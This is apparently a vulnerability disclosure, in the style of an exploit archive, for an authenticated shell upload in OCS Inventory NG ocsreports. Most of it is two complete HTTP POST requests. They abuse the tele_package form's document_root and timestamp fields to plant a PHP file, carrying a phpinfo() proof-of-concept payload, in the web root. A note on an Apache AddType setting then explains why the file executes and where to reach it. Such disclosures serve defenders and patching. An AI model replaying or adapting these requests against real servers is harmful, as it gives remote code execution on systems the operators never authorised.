OCS Inventory NG ocsreports Shell Upload

OCS Inventory NG suffers from an ocsreports authenticated remote code execution vulnerability via a shell upload.


MD5 | cdb899f87fd086c3c20bd02fe32b2495

## Request 1

This request creates a temporary file containing PHP code in the /usr/share/ocsinventory-reports/ocsreports/a.php.a/ directory.

POST /ocsreports/index.php?function=tele_package HTTP/1.1
Host: 192.168.5.135
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.5.135/ocsreports/index.php?function=tele_package
Content-Type: multipart/form-data; boundary=---------------------------491299511942
Content-Length: 2836
Cookie: VERS=7015; LANG=en_GB; IPDISCOVER_inv_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%226%22%3Bi%3A5%3Bs%3A1%3A%227%22%3B%7D; show_all_plugins_col=a%3A8%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%221%22%3Bi%3A2%3Bs%3A1%3A%222%22%3Bi%3A3%3Bs%3A1%3A%223%22%3Bi%3A4%3Bs%3A1%3A%224%22%3Bi%3A5%3Bs%3A1%3A%225%22%3Bi%3A6%3Bs%3A1%3A%226%22%3Bi%3A7%3Bs%3A1%3A%228%22%3B%7D; PHPSESSID=uvq1vomo3oi2q9mfolj9bvr6m0
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------491299511942
Content-Disposition: form-data; name="CSRF_10"

8ab3df2f9a2078530027e74191af0b087429ad41
-----------------------------491299511942
Content-Disposition: form-data; name="document_root"

/usr/share/ocsinventory-reports/ocsreports/
-----------------------------491299511942
Content-Disposition: form-data; name="timestamp"

a.php.a
-----------------------------491299511942
Content-Disposition: form-data; name="NAME"

dshasdgasga
-----------------------------491299511942
Content-Disposition: form-data; name="DESCRIPTION"

asdgasdga
-----------------------------491299511942
Content-Disposition: form-data; name="OS"

WINDOWS
-----------------------------491299511942
Content-Disposition: form-data; name="PROTOCOLE"

HTTP
-----------------------------491299511942
Content-Disposition: form-data; name="PRIORITY"

5
-----------------------------491299511942
Content-Disposition: form-data; name="teledeploy_file"; filename="exploit.zip"
Content-Type: application/x-zip-compressed

<?php

phpinfo();

?>
-----------------------------491299511942
Content-Disposition: form-data; name="ACTION"

EXECUTE
-----------------------------491299511942
Content-Disposition: form-data; name="ACTION_INPUT"

asdgasdgasdg
-----------------------------491299511942
Content-Disposition: form-data; name="REDISTRIB_USE"

0
-----------------------------491299511942
Content-Disposition: form-data; name="DOWNLOAD_SERVER_DOCROOT"

d:\tele_ocs
-----------------------------491299511942
Content-Disposition: form-data; name="REDISTRIB_PRIORITY"

5
-----------------------------491299511942
Content-Disposition: form-data; name="NOTIFY_USER"

0
-----------------------------491299511942
Content-Disposition: form-data; name="NOTIFY_TEXT"

-----------------------------491299511942
Content-Disposition: form-data; name="NOTIFY_COUNTDOWN"

-----------------------------491299511942
Content-Disposition: form-data; name="NOTIFY_CAN_ABORT"

0
-----------------------------491299511942
Content-Disposition: form-data; name="NOTIFY_CAN_DELAY"

0
-----------------------------491299511942
Content-Disposition: form-data; name="NEED_DONE_ACTION"

0
-----------------------------491299511942
Content-Disposition: form-data; name="NEED_DONE_ACTION_TEXT"

-----------------------------491299511942
Content-Disposition: form-data; name="valid"

Send
-----------------------------491299511942
Content-Disposition: form-data; name="digest_algo"

MD5
-----------------------------491299511942
Content-Disposition: form-data; name="digest_encod"

Hexa
-----------------------------491299511942
Content-Disposition: form-data; name="download_rep_creat"

/var/www/html/download/server/
-----------------------------491299511942--

## Request 2

This request renames the file to a.php.a-1 and also creates info file.

POST /ocsreports/index.php?function=tele_package HTTP/1.1
Host: 192.168.5.135
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.5.135/ocsreports/index.php?function=tele_package
Content-Type: multipart/form-data; boundary=---------------------------4827543632391
Content-Length: 3345
Cookie: VERS=7015; LANG=en_GB; IPDISCOVER_inv_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%226%22%3Bi%3A5%3Bs%3A1%3A%227%22%3B%7D; show_all_plugins_col=a%3A8%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%221%22%3Bi%3A2%3Bs%3A1%3A%222%22%3Bi%3A3%3Bs%3A1%3A%223%22%3Bi%3A4%3Bs%3A1%3A%224%22%3Bi%3A5%3Bs%3A1%3A%225%22%3Bi%3A6%3Bs%3A1%3A%226%22%3Bi%3A7%3Bs%3A1%3A%228%22%3B%7D; PHPSESSID=uvq1vomo3oi2q9mfolj9bvr6m0
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------4827543632391
Content-Disposition: form-data; name="CSRF_13"

53b6eab749060aa8cbe972e9c9a31ae148cf886b
-----------------------------4827543632391
Content-Disposition: form-data; name="tailleFrag"

0
-----------------------------4827543632391
Content-Disposition: form-data; name="nbfrags"

1
-----------------------------4827543632391
Content-Disposition: form-data; name="comment"

asdgasdga
-----------------------------4827543632391
Content-Disposition: form-data; name="digest"

b14f8d3b56fb10f2257f53ab32947a50
-----------------------------4827543632391
Content-Disposition: form-data; name="VALID_END"

END
-----------------------------4827543632391
Content-Disposition: form-data; name="SIZE"

347
-----------------------------4827543632391
Content-Disposition: form-data; name="document_root"

/usr/share/ocsinventory-reports/ocsreports/
-----------------------------4827543632391
Content-Disposition: form-data; name="timestamp"

a.php.a
-----------------------------4827543632391
Content-Disposition: form-data; name="NAME"

dshasdgasga
-----------------------------4827543632391
Content-Disposition: form-data; name="DESCRIPTION"

-----------------------------4827543632391
Content-Disposition: form-data; name="OS"

WINDOWS
-----------------------------4827543632391
Content-Disposition: form-data; name="PROTOCOLE"

HTTP
-----------------------------4827543632391
Content-Disposition: form-data; name="PRIORITY"

5
-----------------------------4827543632391
Content-Disposition: form-data; name="teledeploy_file"; filename=""
Content-Type: application/octet-stream

-----------------------------4827543632391
Content-Disposition: form-data; name="ACTION"

EXECUTE
-----------------------------4827543632391
Content-Disposition: form-data; name="ACTION_INPUT"

asdgasdgasdg
-----------------------------4827543632391
Content-Disposition: form-data; name="REDISTRIB_USE"

0
-----------------------------4827543632391
Content-Disposition: form-data; name="DOWNLOAD_SERVER_DOCROOT"

d:\tele_ocs
-----------------------------4827543632391
Content-Disposition: form-data; name="REDISTRIB_PRIORITY"

5
-----------------------------4827543632391
Content-Disposition: form-data; name="NOTIFY_USER"

0
-----------------------------4827543632391
Content-Disposition: form-data; name="NOTIFY_TEXT"

-----------------------------4827543632391
Content-Disposition: form-data; name="NOTIFY_COUNTDOWN"

-----------------------------4827543632391
Content-Disposition: form-data; name="NOTIFY_CAN_ABORT"

0
-----------------------------4827543632391
Content-Disposition: form-data; name="NOTIFY_CAN_DELAY"

0
-----------------------------4827543632391
Content-Disposition: form-data; name="NEED_DONE_ACTION"

0
-----------------------------4827543632391
Content-Disposition: form-data; name="NEED_DONE_ACTION_TEXT"

-----------------------------4827543632391
Content-Disposition: form-data; name="digest_algo"

MD5
-----------------------------4827543632391
Content-Disposition: form-data; name="digest_encod"

Hexa
-----------------------------4827543632391
Content-Disposition: form-data; name="download_rep_creat"

/var/www/html/download/server/
-----------------------------4827543632391--

# Apache Config

The application has the following line in the /etc/apache2/conf-available/ocsinventory-reports.conf config file:

AddType application/x-httpd-php .php

Thus any file containing .php substring might be executed by an attacker. Thus the uploaded file is accessible via http://192.168.5.135/ocsreports/a.php.a/a.php.a-1
Reference: https://httpd.apache.org/docs/2.4/mod/mod_mime.html#multipleext

Regards,
Simon Uvarov



Related Posts